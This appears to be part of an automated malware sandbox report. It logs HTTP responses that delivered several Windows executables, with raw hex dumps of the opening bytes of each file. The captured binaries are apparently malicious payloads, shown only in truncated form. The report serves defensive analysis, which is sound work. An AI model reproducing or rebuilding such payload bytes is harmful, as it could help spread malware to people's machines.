26 2b 0c 72 1f 00 00 70 28 03 00 00 06 de 14 de 03 26 de 00 20 c0 d4 01 00 28 1e 00 00 0a 38 3d ff ff ff 2a 00 00 00 01 10 00 00 00 00 36 00 b0 e6 00 03 10 00 00 01 1b 30 03 00 28 00 00 00 02 00 00 11 72 25 01 00 70 0a 7e 1f 00 00 0a 06 17 6f 20 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 11776Last-Modified: Tue, 24 Dec 2024 12:55:27 GMTConnection: keep-aliveETag: "676aaf3f-2e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3c a2 e3 af 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 18 00 00 00 14 00 00 00 00 00 00 8e 36 00 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 00 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 36 00 00 4b 00 00 00 00 40 00 00 e4 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 0c 00 00 00 24 36 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 16 00 00 00 20 00 00 00 18 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 10 00 00 00 40 00 00 00 12 00 00 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 36 00 00 00 00 00 00 48 00 00 00 02 00 05 00 94 22 00 00 90 13 00 00 03 00 02 00 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 13 30 02 00 4b 00 00 00 01 00 00 11 28 03 00 00 0a 6f 04 00 00 0a 28 0e 00 00 06 0a 28 0d 00 00 06 2c 14 06 72 01 00 00 70 6f 05 00 00 0a 2d 07 28 0b 00 00 06 2b 19 28 0d 00 00 06 2c 12 06 72 01 00 00 70 6f 05 00 00 0a 2c 05 28 0c 00 00 06 16 28 06 00 00 0a 2a 00 13 30 09 00 7f 00 00 00 02 00 00 11 28 07 00 00 0a 6f 08 00 00 0a 0a 72 07 00 00 70 28 09 00 00 0a 16 9a 6f 0a 00 00 0a 7e 0b 00 00 0a 0b 18 12 01 28 02 00 00 06 26 12 02 fe 15 04 00 00 02 12 02 17 7d 1a 00 00 04 12 02 16 7d 1b 00 00 04 12 04 fe 15 06 00 00 02 7e 0b 00 00 0a 13 05 07 20 00 00 00 02 12 04 18 17 12 05 28 05 00 00 06 26 11 05 18 14 06 20 00 00 00 04 7e 0b 00 00 0a 14 12 02 12 03 28 06 00 00 06 26 2a 00 13 30 04 00 8e 00 00 00 03 00 00 11 72 19 00 00 70 28 09 00 00 0a 16 9a 6f 04 00 00 0a 0a 20 00 10 00 00 16 06 28 01 00 00 06 20 ff 01 0f 00 12 01 28 02 00 00 06 26 12 02 fe 15 0c 00 00 02 12 02 7c 62 00 00 04 7e 0b 00 00 0a 7d 63 00 00 04 12
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 1501214Last-Modified: Sun, 26 Jan 2025 20:27:32 GMTConnection: keep-aliveETag: "67969ab4-16e81e"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 bd ea e2 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 24 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 20 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 d4 02 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d4 02 01 00 00 10 02 00 00 04 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 27 Jan 2025 07:20:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Wed, 11 Dec 2024 11:43:09 GMTETag: "7200-628fd1a0f08cb"Accept-Ranges: bytesContent-Length: 29184Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 21 6e e6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 5c 00 00 00 6e 00 00 00 00 00 00 8e 7a 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 7a 00 00 57 00 00 00 00 80 00 00 70 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 b4 7a 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 5b 00 00 00 20 00 00 00 5c 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 11 00 00 00 80 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 7a 00 00 00 00 00 00 48 00 00 00 02 00 05 00 7c 3e 00 00 00 3b 00 00 03 00 00 00 27 00 00 06 7c 79 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 bf 00 00 00 00 00 00 80 3f 00 00 80 bf 00 00 00 00 00 00 80 3f 00 00 80 bf 00 00 00 00 00 00 80 3f 00 00 40 40 00 00 00 00 00 00 40 c0 00 00 20 41 00 00 00 00 00 00 20 c1 00 00 40 40 00 00 00 00 00 00 40 c0 00 00 80 bf 00 00 80 bf 00 00 80 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3f 00 00 80 3f 00 00 80 3f 00 00 40 40 00 00 20 41 00 00 40 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 c0 00 00 20 c1 00 00 40 c0 00 00 00 00 00 00 80 bf 00 00 00 00 00 00 80 bf 00 00 a0 40 00 00 80 bf 00 00 00 00 00 00 80 bf 00 00 00 00 26 02 28 11 00 00 0a 00 00 2a 00 00 13 30 05 00 be 00 00 00 01 00 00 11 2b 19 fe 0c 03 00 45 04 00 00 00 35 00 00 00 98 00 00 00 56 00 00 00 16 00 00 00 00 7e 47 00 00 04 20 fd ff ff ff 28 38 00 00 06 fe 0e 03 00 2b d1 00 7e 01 00 00 04 14 fe 01 0a 7e 47 00 00 04 20 00 00 00 00 28 38 00 00 06 fe 0e 03 00 2b b2 06 2c 61 00 17 2b 03 16 2b 00 2c f4 7e 47 00 00 04 20 fe ff ff ff 28 38 00 00 06 fe 0e 03 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 905203Last-Modified: Sat, 25 Jan 2025 19:48:26 GMTConnection: keep-aliveETag: "6795400a-dcff3"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 10 00 00 04 00 00 7d 40 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 16 a4 00 00 00 00 00 00 00 00 00 00 33 73 0d 00 c0 5c 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 16 a4 00 00 00 00 10 00 00 a6 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 b0 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 353280Last-Modified: Sat, 25 Jan 2025 18:47:11 GMTConnection: keep-aliveETag: "679531af-56400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 11 56 3d e7 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 50 03 00 00 0a 00 00 00 00 00 00 fe 6d 03 00 00 20 00 00 00 80 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 05 00 00 04 00 00 62 26 04 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 b0 6d 03 00 4b 00 00 00 00 80 03 00 2e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 6e 6d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 4e 03 00 00 20 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2e 06 00 00 00 80 03 00 00 08 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 5c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 53 00 00 00 00 28 04 02 00 00 c0 03 00 00 06 02 00 00 5e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 6492672Last-Modified: Fri, 24 Jan 2025 09:42:38 GMTConnection: keep-aliveETag: "6793608e-631200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 04 00 00 00 00 00 ff ff 00 00 8b 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 00 00 00 00 00 f4 61 00 00 00 00 00 e0 00 02 03 0b 01 03 00 00 48 2d 00 00 22 06 00 00 00 00 00 60 54 06 00 00 10 00 00 00 00 5b 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 01 00 01 00 00 00 06 00 01 00 00 00 00 00 00 40 66 00 00 04 00 00 0d 07 64 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 f0 62 00 dc 03 00 00 00 20 65 00 98 1a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 63 00 52 07 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d 5b 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 05 47 2d 00 00 10 00 00 00 48 2d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 dc 94 2d 00 00 60 2d 00 00 96 2d 00 00 4c 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 ed 07 00 00 00 5b 00 00 06 05 00 00 e2 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 dc 03 00 00 00 f0 62 00 00 04 00 00 00 e8 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 52 07 02 00 00 00 63 00 00 08 02 00 00 ec 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 73 79 6d 74 61 62 00 04 00 00 00 00 10 65 00 00 02 00 00 00 f4 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 2e 72 73 72 63 00 00 00 98 1a 01 00 00 20 65 00 00 1c 01 00 00 f6 61 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 27 Jan 2025 07:20:17 GMTContent-Type: application/octet-streamContent-Length: 905203Last-Modified: Sat, 25 Jan 2025 19:48:27 GMTConnection: keep-aliveETag: "6795400b-dcff3"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 62 7c 80 4e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7a 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 10 00 00 04 00 00 7d 40 0e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac 00 00 b4 00 00 00 00 00 10 00 16 a4 00 00 00 00 00 00 00 00 00 00 33 73 0d 00 c0 5c 00 00 00 60 08 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 72 00 00 00 10 00 00 00 74 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6e 2b 00 00 00 90 00 00 00 2c 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2b 07 00 00 c0 00 00 00 02 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 f0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 16 a4 00 00 00 00 10 00 00 a6 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d6 0f 00 00 00 b0 10 00 00 10 00 00 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
